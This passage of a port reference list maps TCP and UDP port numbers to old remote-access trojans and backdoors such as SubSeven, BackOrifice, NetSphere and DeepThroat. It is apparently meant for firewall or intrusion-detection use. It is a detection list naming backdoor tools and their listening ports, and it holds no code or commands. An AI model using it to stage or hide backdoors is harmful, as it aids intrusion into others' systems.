TCP 14502 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14503 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14504 PCInvader.050, PCInvader.060
TCP 15092 HostControl.100, HostControl.260
TCP 15382 SubZero.100
TCP 15432 Cyn.210
TCP 15555 ICMIBC.100
TCP 16322 LastDoor.100
TCP 16484 MoSucker.110
TCP 16661 Dfch.010
TCP 16969 Progenic.100
TCP 16982 AcidShiver.100
TCP 17300 Kuang.200
TCP 17499 CrazzyNet.370, CrazzyNet.375, CrazzyNet.521
TCP 17500 CrazzyNet.370, CrazzyNet.375, CrazzyNet.521
TCP 17569 Infector.141, Infector.160, Infector.170, Infector.180, Infector.190, Infector.200, Intruder.100, Intruder.100
TCP 17593 AudioDoor.120
TCP 19191 BlueFire.035, BlueFire.041
TCP 19604 Metal.270
TCP 19605 Metal.270
TCP 19991 Dfch.010
TCP 20000 Millenium.100
TCP 20001 Millenium.100, PshychoFiles.180
TCP 20002 AcidKor.100, PshychoFiles.180
TCP 20005 MoSucker.200, MoSucker.210, MoSucker.220
TCP 21212 Schwindler.182
TCP 21554 Exploiter.100, Exploiter.110, Girlfriend.130, GirlFriend.135
TCP 21579 Breach.2001
TCP 21584 Breach.2001
TCP 21684 Intruse.134
TCP 22068 AcidShiver.110
TCP 22115 Cyn.120
TCP 22222 Prosiak.047, Ruler.141, Rux.300, Rux.400, Rux.500, Rux.600
TCP 22223 Rux.400, Rux.500, Rux.600
TCP 22456 Bla.200, Bla.503
TCP 22457 AcidShiver.120, Bla.200, Bla.503
TCP 22784 Intruzzo.110
TCP 22845 Breach.450
TCP 22847 Breach.450
TCP 23005 Infinaeon.110, NetTrash.100, Oxon.110, WinRat.100
TCP 23006 Infinaeon.110, NetTrash.100, Oxon.110, WinRat.100
TCP 23032 Amanda.200
TCP 23432 Asylum.010, Asylum.012, Asylum.013, Asylum.014, MiniAsylum.110
TCP 23456 EvilFTP.100, VagrNocker.400
TCP 23476 DonaldDick.153, DonaldDick.154, DonaldDick.155
TCP 23477 DonaldDick.153
TCP 24000 Infector.170
TCP 24307 Wildek.020
TCP 25386 MoonPie.220
TCP 25486 MoonPie.220
TCP 25555 FreddyK.100, FreddyK.200
TCP 25556 FreddyK.100
TCP 25685 MoonPie.010, MoonPie.012, MoonPie.130, MoonPie.220, MoonPie.240, MoonPie.400
TCP 25686 MoonPie.135, MoonPie.200, MoonPie.400
TCP 25982 MoonPie.135, MoonPie.200
TCP 26274 Delta.050
TCP 27160 MoonPie.135, MoonPie.200
TCP 27184 Alvgus.100, Alvgus.800
TCP 27374 Muerte.110, Subseven.210, SubSeven.213
TCP 28429 Hack'a'Tack.2000
TCP 28430 Hack'a'Tack.2000
TCP 28431 Hack'a'Tack.2000
TCP 28432 Hack'a'Tack.2000
TCP 28433 Hack'a'Tack.2000
TCP 28434 Hack'a'Tack.2000
TCP 28435 Hack'a'Tack.2000
TCP 28436 Hack'a'Tack.2000
TCP 29559 DuckToy.100, DuckToy.101, Katux.200, Latinus.140, Latinus.150, Pest.100, Pest.400
TCP 29891 Unexplained.100
TCP 30000 Infector.170
TCP 30001 Error32.100
TCP 30003 LamersDeath.100
TCP 30029 AOLTrojan.110
TCP 30100 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30101 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30102 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30103 NetSphere.131
TCP 30947 Intruse.134
TCP 31320 LittleWitch.400, LittleWitch.420
TCP 31337 BackOrifice.120, Khaled.100, OPC.200
TCP 31415 Lithium.101
TCP 31416 Lithium.100, Lithium.101
TCP 31557 Xanadu.110
TCP 31631 CleptoManicos.100
TCP 31745 Buschtrommel.100, Buschtrommel.122
TCP 31785 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31787 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31789 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31791 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31887 BDDT.100
TCP 31889 BDDT.100
TCP 32100 ProjectNext.053
TCP 32418 AcidBattery.100
TCP 32791 Akropolis.100, Rocks.100
TCP 33291 RemoteHak.001
TCP 33333 Blackharaz.100, Prosiak.047, SubSeven.214
TCP 33577 SonOfPsychward.020
TCP 34324 TelnetServer.100
TCP 34763 Infector.180, Infector.190, Infector.200
TCP 35000 Infector.190, Infector.200
TCP 35600 Subsari.140
TCP 36794 BugBear.100
TCP 37237 Mantis.020
TCP 37651 YAT.210
TCP 37653 YAT.310
TCP 40308 Subsari.140
TCP 40412 TheSpy.100
TCP 40421 MastersParadise.970
TCP 40422 MastersParadise.970
TCP 40999 DiemsMutter.110, DiemsMutter.140
TCP 41626 Shah.100
TCP 44444 Prosiak.070
TCP 45673 Akropolis.100, Rocks.100
TCP 47262 Delta.050
TCP 48006 Fragglerock.200
TCP 49683 HolzPferd.210
TCP 50000 Infector.180
TCP 50130 Enterprise.100
TCP 50766 Fore.100
TCP 51234 Cyn.210
TCP 51966 Cafeini.080, Cafeini.110
TCP 54321 PCInvader.010
TCP 57341 NetRaider.100
TCP 57922 Bionet.084
TCP 58008 Tron.100
TCP 58009 Tron.100
TCP 59090 AcidReign.200
TCP 59211 DuckToy.100, DuckToy.101
TCP 59345 NewFuture.100
TCP 60000 DeepThroat.300, MiniBacklash.100, MiniBacklash.101, MiniBacklash.101
TCP 60411 Connection.100, Connection.130
TCP 60412 Connection.130
TCP 60552 RoxRat.100
TCP 63536 InsaneNetwork.500
TCP 63878 AphexFTP.100
TCP 63879 AphexFTP.100
TCP 64969 Lithium.100
TCP 65000 Socket.100
UDP 1 SocketsDeTroie.250
UDP 666 Bla.200, Bla.400, Bla.503, Noknok.820
UDP 1130 Noknok.800, Noknok.820
UDP 2140 DeepThroat.100, DeepThroat.200, DeepThroat.310
UDP 2989 Rat.200
UDP 3128 MastersParadise.970
UDP 3129 MastersParadise.920, MastersParadise.970
UDP 3150 DeepThroat.100, DeepThroat.200, DeepThroat.310, MiniBacklash.110
UDP 3333 Daodan.123
UDP 3800 Eclypse.100
UDP 3996 RemoteAnything.364
UDP 4000 RemoteAnything.364
UDP 5555 Daodan.123
UDP 5881 Y3KRat.110, Y3KRat.140
UDP 5882 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
UDP 5883 Y3KRat.110, Y3KRat.140
UDP 5884 Y3KRat.140, Y3KRat.150
UDP 5885 Y3KRat.110, Y3KRat.120, Y3KRat.140
UDP 5886 Y3KRat.120, Y3KRat.140
UDP 5887 Y3KRat.110, Y3KRat.120, Y3KRat.140
UDP 5888 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.150
UDP 6953 Lithium.100
UDP 8012 Ptakks.217
UDP 10067 PortalOfDoom.100
UDP 10167 PortalOfDoom.100
UDP 10666 Ambush.100
UDP 11225 Cyn.100, Cyn.103, Cyn.120
UDP 11306 Noknok.800, Noknok.820
UDP 12389 KheSanh.210
UDP 12623 Buttman.090, Buttman.100
UDP 12625 Buttman.100
UDP 14100 Eurosol.100
UDP 23476 DonaldDick.155
UDP 26274 Delta.050
UDP 27184 Alvgus.100
UDP 28431 Hack'a'Tack.2000
UDP 28432 Hack'a'Tack.2000
UDP 28433 Hack'a'Tack.2000
UDP 28434 Hack'a'Tack.2000
UDP 28435 Hack'a'Tack.2000
UDP 28436 Hack'a'Tack.2000
UDP 29891 Unexplained.100
UDP 30103 NetSphere.131
UDP 31320 LittleWitch.400, LittleWitch.420
UDP 31337 BackOrifice.120, OPC.200
UDP 31416 Lithium.100, Lithium.101
UDP 31789 Hack'a'Tack.100, Hack'a'Tack.112
UDP 31791 Hack'a'Tack.100, Hack'a'Tack.112
UDP 33333 Blackharaz.100
UDP 47262 Delta.050
UDP 49683 HolzPferd.210
UDP 60000 MiniBacklash.100